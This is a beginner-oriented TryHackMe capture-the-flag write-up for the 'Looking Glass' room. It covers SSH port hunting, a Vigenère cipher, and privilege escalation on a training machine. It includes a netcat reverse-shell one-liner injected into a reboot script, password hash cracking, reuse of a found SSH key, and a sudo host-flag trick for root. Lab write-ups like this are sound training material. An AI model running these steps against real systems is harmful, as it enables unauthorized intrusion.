LOOKING GLASS Write-up | TryHackMe | by Valerie23

LOOKING GLASS:https://tryhackme.com/room/lookingglass 


Starting with a simple nmap scan to see which ports are open and what services are running on these ports.
Nmap scan results in a long list of open ports ranging from 9000 to 13783. And the ssh service is running on all these ports so lets try connecting to one of the Dropbear ports (for username - you can use any random name).

When we try connecting to port 9000 it tells us to go "lower" which we cannot do since 9000 is the lowermost open port (apart from 22). And when we try connecting to the uppermost open port 13783 , it tell us to go higher which is again impossible.

So now we visit tryhackme again and take the hint given in user flag which says "A looking glass is a mirror" .

So the output messages are mirrored. When it prints "LOWER" we actually need to go higher and vice-versa.

So lets try to find the real port while shrinking the range

 ssh toii@ -o StrictHostKeyChecking=no -p 12373

We have finally found our real port 12373
But has given us an encoded piece of text and is asking for a secret.

Lets try to decode the text. At first glance it looks somewhat like ROT13. But this is actually "Vignere Cipher". To decode a Vignere Cipher we usually need a key. Thanks to this website that automatically detects the possible keys:


Copy the cipher in the output message and paste it on the website it will give you the key and probably half of the decoded text. Try decoding the cipher again (this time with the key) to get the secret.

The last line of the cipher contains the secret:

Your secret is : bewar**********wock

Enter the secret to receive SSH credentials.

NOTE: These credentials will change everytime. So you will have to find your own as these will not work for you.

Now we can connect to the ssh and gain the user flag.
We will find a mirrored user flag. To receive the original flag use the command:
echo <flag> | rev



Using sudo -l

Now we know that we can execute /sbin/reboot with root permissions.
Lets look at the crontab now.

Here we can see that a script twasBrilling.sh gets executed everytime the system is rebooted.
Lets see if we have permissions to alter the contents of twasBrilling.sh
And the answer is yes, so now we can put reverse shell inside it.
We can take help of this website for
We used
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

In tweedledum's home directory we can see a file named humptydumpty.txt.
It contains a hash , lets try and crack it on

looks like the last hash is the password for user humptydumpty
So we copied the hash and pasted it on http://icyberchef.com/ to try and decode it. Finally we cracked it by converting it from hex. Then with the cracked password we escalated our privileges to root.
su humptydumpty


There is a file named "poetry.txt" in humptydumpty's home directory.
But unfortunately there is no clue in it.
Lets visit other user's directory. Alice's directory contains ssh key, we can use this to connect to alice's ssh account.
So lets copy this 
file into our system and change its permissions using chmod 600 filename
then connect using the command:
ssh -i alicekey alice@


Alice's directory contains a kitten.txt file but again there is no hint inside it for furthur escalation.
So we try viewing tweedledee's directory sadly we don't have permissions to do so.
And we cannot run sudo -l since we don't have alice's password>
So we can try viewing sudoers file instead.

Here we can run /bin/bash as root using ssalg-gnikool as host .
s use sudo --help to find the flag used for specifying host,
we get to know that -h about -h flag, lets make use of it.


Again we will receive a mirrored flag, and using the same command as before we can gain the original flag.

I have tried to include a lot of details to make it possible for even the beginners to complete the room while learning new things.

                                                                       -by Valerie23


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